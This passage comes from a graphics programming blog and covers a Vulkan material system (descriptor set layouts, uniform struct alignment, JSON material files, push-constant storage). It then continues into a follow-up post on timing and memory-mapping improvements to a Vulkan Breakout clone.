<p>One of the first things you need to do when you’re creating your material is to make VkDescriptorSetLayouts for each descriptor set in use by the shaders in your material. Eventually, you use this array of DescriptorSetLayouts as part of your VkPipelineLayoutCreateInfo struct. One thing you may have noticed is that a VkDescriptorSetLayout struct doesn’t have any spot for specifying which set that layout is for. This means the api assumes that the array of VkDescriptorSetLayouts that you use is a continuous collection of sets - that is - if your array is 3 elements long, it is for sets 0, 1, and 2.</p>
<p>In practice, you’ll likely have gaps in the sets that your shaders use, especially if you assign each set number a specific use case, like I did above. In this case, you need to make a VkDescriptorSet for each set you aren’t using as well. These “empty” elements will have their binding count set to 0, and their pBindings array set to null, but still need to be in your final array of set layouts, or else nothing is going to work right.</p>
<h2 id="if-youre-manually-specifying-a-struct-that-maps-to-a-set-alignment-matters">If you’re manually specifying a struct that maps to a set, alignment matters</h2>
<p>To keep things simple, I’m keeping my global data as a mapped struct, since I’m assuming (hoping?) that because it’s not a lot of data, and it only gets updated once a frame, there won’t be much of a performance penalty (this is untested right now though, so… ymmv).</p>
<p>When I first set this up, I defined my struct like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">GlobalShaderData</span>
<span class="p">{</span>
<span class="n">glm</span><span class="o">::</span><span class="n">float32</span> <span class="n">time</span><span class="p">;</span>
<span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">mouse</span><span class="p">;</span>
<span class="n">glm</span><span class="o">::</span><span class="n">vec2</span> <span class="n">resolution</span><span class="p">;</span>
<span class="n">glm</span><span class="o">::</span><span class="n">mat4</span> <span class="n">viewMatrix</span><span class="p">;</span>
<span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">worldSpaceCameraPos</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>and this compiled and ran…sorta. Data was getting sent to the gpu, but the wrong data seemed to be filling the variables in the shader. Turns out, this is because (as mentioned earlier) uniform struct members are 16 byte aligned in Vulkan.</p>
<p>Awkwardly, fixing this problem in MSVC looks like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">GlobalShaderData</span>
<span class="p">{</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">float32</span> <span class="n">time</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">mouse</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec2</span> <span class="n">resolution</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">mat4</span> <span class="n">viewMatrix</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">worldSpaceCameraPos</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>I’m about 110% positive there’s a less awful way of doing this, so please, please let me know what it is <a href="https://twitter.com/khalladay">on Twitter</a>.</p>
<p>That’s the end of the “potentially helpful to everyone” segment of the post, if you want to know more about the structure of my material systeem so far, read on!</p>
<h2 id="my-ugly-little-material-system">My Ugly Little Material System</h2>
<p>To preface: I’m going to include more information than anyone needs, because I wish implementation details about how someone else had approached this problem was readibly available to me before I started on this path.</p>
<p>As I mentioned earlier, my system works in two passes. The first pass, called the “ShaderPipeline”, is an application that gets run whenever a shader is modified. This handles compiling GLSL into SPIR-V, and generates the reflection files I talked about earlier.</p>
<p>Materials are defined in their own json files (I don’t love json, but <a href="https://github.com/Tencent/rapidjson">rapidjson</a> is really easy to use), which specify which shaders to use for each stage, and default values for their inputs. A Simple material might look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="p">{</span>
<span class="s">"shaders"</span><span class="o">:</span>
<span class="p">[</span>
<span class="p">{</span>
<span class="s">"stage"</span><span class="o">:</span> <span class="s">"vertex"</span><span class="p">,</span>
<span class="s">"shader"</span><span class="o">:</span> <span class="s">"vertex_uvs"</span><span class="p">,</span>
<span class="s">"defaults"</span><span class="o">:</span>
<span class="p">[</span>
<span class="p">{</span>
<span class="s">"name"</span><span class="o">:</span><span class="s">"Instance"</span><span class="p">,</span>
<span class="s">"members"</span><span class="o">:</span>
<span class="p">[</span>
<span class="p">{</span>
<span class="s">"name"</span><span class="o">:</span> <span class="s">"tint"</span><span class="p">,</span>
<span class="s">"value"</span><span class="o">:</span> <span class="p">[</span><span class="mi">0</span><span class="p">.</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">.</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">.</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">.</span><span class="mi">0</span><span class="p">]</span>
<span class="p">}</span>
<span class="p">]</span>
<span class="p">}</span>
<span class="p">]</span>
<span class="p">},</span>
<span class="p">{</span>
<span class="s">"stage"</span><span class="o">:</span> <span class="s">"fragment"</span><span class="p">,</span>
<span class="s">"shader"</span><span class="o">:</span> <span class="s">"fragment_passthrough"</span><span class="p">,</span>
<span class="s">"defaults"</span><span class="o">:</span>
<span class="p">[</span>
<span class="p">{</span>
<span class="s">"name"</span><span class="o">:</span> <span class="s">"texSampler"</span><span class="p">,</span>
<span class="s">"value"</span><span class="o">:</span><span class="s">"../data/textures/airplane.png"</span>
<span class="p">}</span>
<span class="p">]</span>
<span class="p">}</span>
<span class="p">]</span>
<span class="p">}</span></code></pre></figure>
<p>When a material is loaded from a file, this material file is unpacked into a Material::Definition struct, which is formatted to make it easy to access the data we need when creating the vulkan material. Below is what that struct looks like, but if you want to know what the custom types inside it are (like PushConstantBlock), go check out <a href="https://github.com/khalladay/VkMaterialSystem/blob/master/VkMaterialSystem/material_creation.h">material_creation.h</a></p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">Definition</span>
<span class="p">{</span>
<span class="n">PushConstantBlock</span> <span class="n">pcBlock</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="n">ShaderStageDefinition</span><span class="o">></span> <span class="n">stages</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">map</span><span class="o"><</span><span class="kt">uint32_t</span><span class="p">,</span> <span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="n">DescriptorSetBinding</span><span class="o">>></span> <span class="n">descSets</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="kt">uint32_t</span><span class="o">></span> <span class="n">dynamicSets</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="kt">uint32_t</span><span class="o">></span> <span class="n">staticSets</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="kt">uint32_t</span><span class="o">></span> <span class="n">globalSets</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numStaticUniforms</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numStaticTextures</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numDynamicUniforms</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numDynamicTextures</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">staticSetsSize</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">dynamicSetsSize</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>The Material::Definition struct is what gets passed to the material creation function. If you really wanted to, you could create a definition at runtime and make new materials on the fly. I’m sure at some point I’ll think of a clever reason to do that.</p>
<p>The advantage of this Material::Definition struct is that it’s trivial to add more information to it. If I wanted my material json files to specify blend mode, ZWrite behaviour, Culling Mode, Polygon Mode, or anything else, I can just add a field to this and grab it out of the json. For now, the creation method just assumes I want an opque, ZWriting, Cull Back, Polygon Filled material, but that will be made configurable pretty much as soon as I want to have a translucent material.</p>
<p>Once loaded, all the data needed to render a material is stored in a MaterialRenderData struct:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">MaterialRenderData</span>
<span class="p">{</span>
<span class="c1">//general material data</span>
<span class="n">VkPipeline</span> <span class="n">pipeline</span><span class="p">;</span>
<span class="n">VkPipelineLayout</span> <span class="n">pipelineLayout</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">layoutCount</span><span class="p">;</span>
<span class="n">VkDescriptorSetLayout</span><span class="o">*</span> <span class="n">descriptorSetLayouts</span><span class="p">;</span>
<span class="n">VkDescriptorSet</span><span class="o">*</span> <span class="n">descSets</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numDescSets</span><span class="p">;</span>
<span class="n">UniformBlockDef</span> <span class="n">pushConstantLayout</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">pushConstantData</span><span class="p">;</span>
<span class="c1">//we don't need a layout for static data since it cannot be</span>
<span class="c1">//changed after initialization</span>
<span class="n">VkBuffer</span><span class="o">*</span> <span class="n">staticBuffers</span><span class="p">;</span>
<span class="n">VkDeviceMemory</span> <span class="n">staticUniformMem</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numStaticBuffers</span><span class="p">;</span>
<span class="c1">//for now, just add buffers here to modify. when this</span>
<span class="c1">//is modified to support material instances, we'll change it</span>
<span class="c1">//to something more sane.</span>
<span class="n">MaterialDynamicData</span> <span class="n">dynamic</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>There are a few things to talk about here. Firstly, I store the data used for a material’s push constants in the RenderData struct, so that if nothing has changed since the last time they were set, we have that data already sorted out. Rather than store each of the push constant members in a map, or other collection, I keep all the data for the entire push constant block in a char* buffer, and then store layout data about that char* in a UniformBlockDef struct, which looks like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">UniformBlockDef</span>
<span class="p">{</span>
<span class="c1">//stride 2 - hashed name / member offset</span>
<span class="kt">uint32_t</span><span class="o">*</span> <span class="n">layout</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">blockSize</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">memberCount</span><span class="p">;</span>
<span class="n">VkShaderStageFlags</span> <span class="n">visibleStages</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>As the comment says, instead of storing string names for the member vars, I hash them and store them along with each member’s offset into the buffer.</p>
<p>Setting a push constant value on a material then becomes a simple matter of looping over this layout buffer until you find the member you want, and using the offset data located next to it:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">setPushConstantData</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="n">matId</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">var</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">data</span><span class="p">,</span> <span class="kt">uint32_t</span> <span class="n">size</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">MaterialRenderData</span><span class="o">&</span> <span class="n">rData</span> <span class="o">=</span> <span class="n">Material</span><span class="o">::</span><span class="n">getRenderData</span><span class="p">(</span><span class="n">matId</span><span class="p">);</span>
<span class="kt">uint32_t</span> <span class="n">varHash</span> <span class="o">=</span> <span class="n">hash</span><span class="p">(</span><span class="n">var</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">rData</span><span class="p">.</span><span class="n">pushConstantLayout</span><span class="p">.</span><span class="n">memberCount</span> <span class="o">*</span> <span class="mi">2</span><span class="p">;</span> <span class="n">i</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rData</span><span class="p">.</span><span class="n">pushConstantLayout</span><span class="p">.</span><span class="n">layout</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="n">varHash</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">rData</span><span class="p">.</span><span class="n">pushConstantLayout</span><span class="p">.</span><span class="n">layout</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">];</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">rData</span><span class="p">.</span><span class="n">pushConstantData</span> <span class="o">+</span> <span class="n">rData</span><span class="p">.</span><span class="n">pushConstantLayout</span><span class="p">.</span><span class="n">layout</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">],</span> <span class="n">data</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Then when it’s time for that material to be rendered, I can just grab the entire buffer of push constant data and send it on its way.</p>
<p>I like this approach to the problem because it makes Push Constant members (and other dynamic data, which uses a smiliar paradigm) “fire and forget” data, that is, nothing blows up if I try to set a push constant var on a material that doesn’t have that member, the function just doesn’t find the member in the layout buffer and does nothing. It ends up working very much like the functions for setting shader inputs on Unity’s Material class.</p>
<p>I use this same paradigm to handle setting dynamic uniform data, although in that case I have to call vkCmdUpdateBuffer instead of just memcpying, since I have to update device local memory. This could probably be sped up by collecting all the updates for a frame and then doing the vulkan update once, but I’ll worry about that in phase 2. Dynamic uniforms also need a bit more information stored about them, so I have a separate struct, called MaterialDynamicData to store that:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">MaterialDynamicData</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">numInputs</span><span class="p">;</span>
<span class="c1">// stride: 4 - hashed name / buffer index / member size / member offset</span>
<span class="c1">// for images- hasehd name / textureViewPtr index / desc set write idx / padding</span>
<span class="kt">uint32_t</span><span class="o">*</span> <span class="n">layout</span><span class="p">;</span>
<span class="n">VkBuffer</span><span class="o">*</span> <span class="n">buffers</span><span class="p">;</span>
<span class="n">VkDeviceMemory</span> <span class="n">uniformMem</span><span class="p">;</span>
<span class="n">VkWriteDescriptorSet</span><span class="o">*</span> <span class="n">descriptorSetWrites</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>The big difference between this and the push constant data is that I’m also keeping the VkWriteDescriptorSet structs around, so that I can change what textures are being used at runtime, and the layout buffer is storing more information per member, but it’s all pretty much working the same way as the push constants.</p>
<p>These MaterialRenderData structs are stored in a map (boo!) that uses uint32_ts as keys. When the renderer wants to get the information about a mesh’s material, it uses the integer material name to get the corresponding struct, and Bob’s your uncle.</p>
<h2 id="problems-and-limitations-with-my-system">Problems and Limitations With My System</h2>
<p>Oh boy, there’s a lot of them. Probably the biggest being that none of it has actually survived being used in a real project, but I suppose there’s some more specific things to point out.</p>
<p>Number one is that storing the VkDeviceMemory directly in the material is probably bad, and should likely be replaced by an actual allocator doing actual allocator things.</p>
<p>Secondly, as mentioned before, this doesn’t handle material instances at all yet, so if you want two materials, using the same shaders but a different texture, you need two whole materials to do it. Phase 2 of this project will remedy that, and add some more customization options to the Material::Definition struct.</p>
<p>All my materials are stored in maps, and setting any data on them requires a map lookup to get the MaterialRenderData struct for that material. This results in a LOT of unnecessary map lookups. Looking up materials by id is going to happen an awful lot, and I’m not thrilled about using a map at all (but it was easy!). Instead, this should probably do something like store materials in an array, use the integer id to store an index into the array and some additional data to handle when an array slot gets re-used (like <a href="http://bitsquid.blogspot.com/2014/08/building-data-oriented-entity-system.html">Bitsquid does with their ECS</a>)</p>
<p>It also should probably support hot reloading of shaders to make editing easier, maybe I should add a phase 3?</p>
<p>Regardless, hopefully this article was helpful to someone! If you want to say hi / want to point out something dumb I’m doing. give me a shout <a href="https://twitter.com/khalladay">on Twitter</a>, or @Khalladay on <a href="gamedev.mastodon.place">Mastodon</a>.</p>
Improving Vulkan Breakout2017-08-30T00:00:00+00:00http://kylehalladay.com/blog/tutorial/vulkan/2017/08/30/Vulkan-Uniform-Buffers-pt2<p>There are lots of reasons why I love the internet, but one of the big ones is that it gives me a way to learn from folks that I would never get to interact with in real life.</p>
<p>Two weeks ago I posted about <a href="http://kylehalladay.com/blog/tutorial/vulkan/2017/08/13/Vulkan-Uniform-Buffers.html">Comparing Uniform Data Transfer Methods In Vulkan</a>, and immediately got a bunch of great suggestions from Twitter (thanks <a href="https://twitter.com/SaschaWillems2">@SaschaWillems2</a>!), and <a href="https://www.reddit.com/r/vulkan/comments/6tf9ut/trying_to_wrap_my_head_around_vulkan_wrote_a_blog/">from reddit</a> on how I could improve things. There was enough there that I thought it warranted revisiting my Breakout clone to test out some new ideas.</p>
<div align="center">
<img src="/images/post_images/2017-08-30/learnding.PNG" />
<font size="2">Me irl</font>
<br /><br />
</div>
<p>The main pieces of feedback were:</p>
<ul>
<li>vkCmdWriteTimestamp could be used to get more fine grained timing data</li>
<li>I really didn’t need to be using _aligned_malloc with my dynamic uniform buffer approach</li>
<li>It might be faster to use device-local memory</li>
<li>With the approaches that don’t use push-constants, it might be faster to re-use command buffers instead of creating them every frame</li>
</ul>
<p>It all sounded like great advice to me, so I decided to try out each point listed above, to see if the conclusions drawn in the first post are still valid.</p>
<p>Starting from the top:</p>
<h2 id="use-vkcmdwritetimestamp">Use vkCmdWriteTimestamp</h2>
<p>I loved this bit of feedback, because it gave me another tool to use to do performance testing! Especially because before hearing about this bit of the api, I had no idea how to profile the performance of a specific chunk of a command buffer.</p>
<p>vkCmdWriteTimestamp writes it’s timing data into a VkQuery object. VkQuery objects are stored in a VkQueryPool. So the first step to getting timing data from vulkan is to create one of those:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">VkQueryPoolCreateInfo</span> <span class="n">createInfo</span> <span class="o">=</span> <span class="p">{};</span>
<span class="n">createInfo</span><span class="p">.</span><span class="n">sType</span> <span class="o">=</span> <span class="n">VK_STRUCTURE_TYPE_QUERY_POOL_CREATE_INFO</span><span class="p">;</span>
<span class="n">createInfo</span><span class="p">.</span><span class="n">pNext</span> <span class="o">=</span> <span class="n">nullptr</span><span class="p">;</span>
<span class="n">createInfo</span><span class="p">.</span><span class="n">queryType</span> <span class="o">=</span> <span class="n">VK_QUERY_TYPE_TIMESTAMP</span><span class="p">;</span>
<span class="n">createInfo</span><span class="p">.</span><span class="n">queryCount</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span>
<span class="n">VkResult</span> <span class="n">res</span> <span class="o">=</span> <span class="n">vkCreateQueryPool</span><span class="p">(</span><span class="n">device</span><span class="p">,</span> <span class="o">&</span><span class="n">createInfo</span><span class="p">,</span> <span class="n">nullptr</span><span class="p">,</span> <span class="o">&</span><span class="n">queryPool</span><span class="p">);</span>
<span class="n">assert</span><span class="p">(</span><span class="n">res</span> <span class="o">==</span> <span class="n">VK_SUCCESS</span><span class="p">);</span></code></pre></figure>
<p>Since I only want to time the part of the rendering pipeline that changes between each uniform data implementation, I only need to allocate 2 queries - one to store the timestamp immediately before the block I’m timing executes, and one to store the timestamp after it’s done.</p>
<p>With that done, all that’s left is to add the appropriate calls to the draw function:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//abbreviated code</span>
<span class="n">vkBeginCommandBuffer</span><span class="p">(</span><span class="n">commandBuffer</span><span class="p">,</span> <span class="o">&</span><span class="n">beginInfo</span><span class="p">);</span>
<span class="n">vkCmdResetQueryPool</span><span class="p">(</span><span class="n">commandBuffer</span><span class="p">,</span> <span class="n">queryPool</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="c1">//more set up code... (omitted for brevity)</span>
<span class="c1">//the block we want to time starts here</span>
<span class="n">vkCmdWriteTimestamp</span><span class="p">(</span><span class="n">commandBuffer</span><span class="p">,</span> <span class="n">VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT</span><span class="p">,</span> <span class="n">queryPool</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">PRIM_COUNT</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//per primitive logic that we want to time</span>
<span class="p">}</span>
<span class="n">vkCmdWriteTimestamp</span><span class="p">(</span><span class="n">commandBuffer</span><span class="p">,</span> <span class="n">VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT</span><span class="p">,</span> <span class="n">queryPool</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span></code></pre></figure>
<p>As you may have noticed, vkCmdWriteTimestamp takes a pipeline stage as one of it’s arguments. This was unintuitive for me, but here’s what the docs say about it:</p>
<blockquote>
<p>“vkCmdWriteTimestamp latches the value of the timer when all previous commands have completed executing as far as the specified pipeline stage, and writes the timestamp value to memory. When the timestamp value is written, the availability status of the query is set to available.”</p>
</blockquote>
<p>What it seems like this means (correct me if I’m wrong, internet), is that if you pass VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT to this function, you get the timestamp of when all the commands submitted to the command buffer BEFORE you call vkCmdWriteTimestamp have completed executing, whereas if you pass, for instance VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, you’d get the timestamp of when the commands before the timestamp call started execution.</p>
<p>Assuming that’s the case, then in order to measure just the execution of our loop in the above example, both calls to vkCmdWriteTimestamp need to be passed the VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT to get just the timing info for the code between the two calls.</p>
<p>If you recall, the frame time of each approach was measured last week as the following:</p>
<div align="center">
<img src="/images/post_images/2017-08-30/vktest.PNG" />
<br /><br />
</div>
<p>I re-ran this test, but this time used vkCmdWriteTimestamp to measure just the time it takes to add the primitives to the command queue and set up their uniform data:</p>
<div align="center">
<img src="/images/post_images/2017-08-30/timestamp.PNG" />
<br /><br />
</div>
<p>This data is likely of questionable usefulness because of how light the entire application is on the GPU, but it’s interesting nonetheless. It suggests that the push constant and single buffer approaches are equal in how fast they are to execute on the GPU. This might mean that the frametime difference between them was mostly due to the added time it took to memcpy data into the buffers for the single buffer approaches.</p>
<p>The multi-buffer approaches are slower than the others in this measure as well, which makes sense given that even when submitting to the command buffer, the multi-buffer branches have to change which buffers are bound all the time. However, because of how simple our frame is, all the approaches are almost exactly as fast. If the above timing code is accurate, it means that all the larger differences we’re seeing in the frametime of the application are due to the cost of memory mapping, and memcpying our uniform data around.</p>
<h2 id="dont-use-_aligned_malloc">Don’t Use _aligned_malloc</h2>
<p>The next piece of feedback came from reddit user <a href="https://www.reddit.com/user/rhynodegreat">rhynodegreat</a>, and it is directly related to the cost of memory mapping we just talked about. It was pointed out that since I was using memcpy to transfer data to a mapped buffer pointer, I didn’t need to be using _aligned_malloc for the original allocation. I admit this was a bit of cargo culting on my end. I originally figured out how to use dynamic uniform buffers from some example code I found online, and didn’t question the use of _aligned_malloc, since I had never used it before.</p>
<p>Luckily, removing it from my code was as simple as replacing any calls to it with a simple malloc call.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">uniformData</span> <span class="o">=</span> <span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="o">*</span><span class="p">)</span><span class="n">_aligned_malloc</span><span class="p">(</span><span class="n">bufferSize</span><span class="p">,</span> <span class="n">dynamicAlignment</span><span class="p">);</span></code></pre></figure>
<p>becomes</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">uniformData</span> <span class="o">=</span> <span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="n">bufferSize</span><span class="p">);</span></code></pre></figure>
<p>Everything still works with the above changes, but I was curious as to whether it had any performance implications, so I compared the DynamicUniformBuffer approach from earlier with the same approach using a regular malloc. I was going to show this in another graph, but I found no real performance difference between them, so it feels like (at least for this use case), whether to use _aligned_malloc or just malloc is a matter of preference / code portability.</p>
<div align="center">
<img src="/images/post_images/2017-08-30/boring.PNG" />
<font size="2"> How i felt when I saw a graph with all the bars the same height </font>
<br /><br />
</div>
<p>However, while testing this, I realized that (for the Single Buffer Approach), I could reduce the need for this allocation at all with a very small amount of effort. If I could get the mapped pointer to the buffer before I pass this data to the draw function, I could save myself a lot of effort. So I rearranged things a bit to try that out:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//abbreviated code</span>
<span class="n">uniformData</span> <span class="o">=</span> <span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="n">bufferSize</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">idx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">uniformChar</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">uniformData</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="k">const</span> <span class="k">auto</span><span class="o">&</span> <span class="n">prim</span> <span class="o">:</span> <span class="n">primitives</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">PrimitiveUniformObject</span> <span class="n">puo</span><span class="p">;</span>
<span class="n">puo</span><span class="p">.</span><span class="n">model</span> <span class="o">=</span> <span class="n">VIEW_PROJECTION</span> <span class="o">*</span> <span class="p">(</span><span class="n">glm</span><span class="o">::</span><span class="n">translate</span><span class="p">(</span><span class="n">prim</span><span class="p">.</span><span class="n">pos</span><span class="p">)</span> <span class="o">*</span> <span class="n">glm</span><span class="o">::</span><span class="n">scale</span><span class="p">(</span><span class="n">prim</span><span class="p">.</span><span class="n">scale</span><span class="p">));</span>
<span class="n">puo</span><span class="p">.</span><span class="n">color</span> <span class="o">=</span> <span class="n">prim</span><span class="p">.</span><span class="n">col</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">uniformChar</span><span class="p">[</span><span class="n">idx</span> <span class="o">*</span> <span class="n">dynamicAlignment</span><span class="p">],</span> <span class="o">&</span><span class="n">puo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">));</span>
<span class="n">idx</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">Renderer</span><span class="o">::</span><span class="n">draw</span><span class="p">(</span><span class="n">uniformData</span><span class="p">,</span> <span class="cm">/* other args */</span><span class="p">);</span></code></pre></figure>
<p>Becomes:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//abbreviated code</span>
<span class="kt">int</span> <span class="n">idx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">uniformChar</span> <span class="o">=</span> <span class="n">Renderer</span><span class="o">::</span><span class="n">mapBufferPtr</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="k">const</span> <span class="k">auto</span><span class="o">&</span> <span class="n">prim</span> <span class="o">:</span> <span class="n">primitives</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">PrimitiveUniformObject</span> <span class="n">puo</span><span class="p">;</span>
<span class="n">puo</span><span class="p">.</span><span class="n">model</span> <span class="o">=</span> <span class="n">VIEW_PROJECTION</span> <span class="o">*</span> <span class="p">(</span><span class="n">glm</span><span class="o">::</span><span class="n">translate</span><span class="p">(</span><span class="n">prim</span><span class="p">.</span><span class="n">pos</span><span class="p">)</span> <span class="o">*</span> <span class="n">glm</span><span class="o">::</span><span class="n">scale</span><span class="p">(</span><span class="n">prim</span><span class="p">.</span><span class="n">scale</span><span class="p">));</span>
<span class="n">puo</span><span class="p">.</span><span class="n">color</span> <span class="o">=</span> <span class="n">prim</span><span class="p">.</span><span class="n">col</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">uniformChar</span><span class="p">[</span><span class="n">idx</span> <span class="o">*</span> <span class="n">dynamicAlignment</span><span class="p">],</span> <span class="o">&</span><span class="n">puo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">));</span>
<span class="n">idx</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">Renderer</span><span class="o">::</span><span class="n">unmapBufferPtr</span><span class="p">();</span>
<span class="n">Renderer</span><span class="o">::</span><span class="n">draw</span><span class="p">(</span> <span class="cm">/* other args */</span><span class="p">);</span></code></pre></figure>
<p>The unmapBufferPtr() call can simply be omitted in order to keep things mapped all the time.</p>
<p>I decided to compare the performance of the Single-Buffer approaches with these changes vs the timing data that I presented last time, and it appears that the above changes yield a modest speed up for all approaches except using push-constants, since they didn’t need the _aligned_alloc call in the first place.</p>
<div align="center">
<img src="/images/post_images/2017-08-30/writingperf.PNG" />
<br /><br />
</div>
<p>Assuming my methodology for these tests is correct (this is outlined at the end of the post), the data points to at least a small performance improvement from removing that unnecessary memcpy, and cleaner code, since it avoids an unnecessary allocation, and copy.</p>
